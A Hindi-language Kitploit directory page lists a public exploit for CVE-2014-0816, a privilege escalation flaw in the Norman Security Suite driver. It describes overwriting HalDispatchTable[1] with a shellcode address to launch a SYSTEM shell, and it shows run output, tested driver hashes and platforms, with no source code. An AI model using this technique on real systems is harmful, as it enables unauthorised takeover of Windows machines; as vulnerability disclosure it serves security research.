Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-0816 — CVE-2014-0816 | Kitploit
उपकरण/GitHubGitHub/tandasat/cve-2014-0816
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubtandasat/cve-2014-0816

CVE-2014-0816

CVE-2014-0816

रिपॉजिटरी देखें
25109 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-0816

यह CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite विशेषाधिकार वृद्धि के लिए संवेदनशील है) के लिए एक एक्सप्लॉइट है।

यह एक्सप्लॉइट ngs.sys / ngs64.sys के IOCTL हैंडलर में भेद्यता का फायदा उठाकर गैर-प्रशासक विशेषाधिकार से SYSTEM विशेषाधिकार के साथ CMD.exe लॉन्च करता है।

उपयोग

root@kitploit:~
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.

फिर आपको एक नया कंसोल दिखाई देगा।

root@kitploit:~
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

भेद्यता एक हमलावर को मनमाने पते को मनमाने मान से अधिलेखित करने की अनुमति देती है, इसलिए यह एक्सप्लॉइट HalDispatchTable[1] के मान को शेलकोड के पते से बदल देता है जो वर्तमान प्रक्रिया के विशेषाधिकार को SYSTEM विशेषाधिकार तक बढ़ा देता है।

demo_win7_x64

यह भेद्यता Windows XP से 8 तक x86/x64 दोनों वाले सभी प्लेटफ़ॉर्म पर शोषणीय होगी, लेकिन यह एक्सप्लॉइट कुछ निश्चित प्लेटफ़ॉर्म के लिए डिज़ाइन और परीक्षण किया गया है (उदाहरण के लिए, यह SMEP के कारण Windows 8 पर कार्य नहीं करेगा)।

परीक्षित प्लेटफ़ॉर्म

  • Norman Security Suite 10.1
  • 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
  • 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
  • d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
  • fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
  • Windows XP (x86) SP3 अतिथि विशेषाधिकार के साथ
  • Windows 7 (x86/x64) SP1 अतिथि विशेषाधिकार के साथ
  • Windows 10 (x64) Build 14393 अतिथि विशेषाधिकार के साथ (SMEP अक्षम)

लाइसेंस

यह सॉफ़्टवेयर MIT लाइसेंस के अंतर्गत जारी किया गया है, LICENSE देखें।

टूल डाउनलोड करें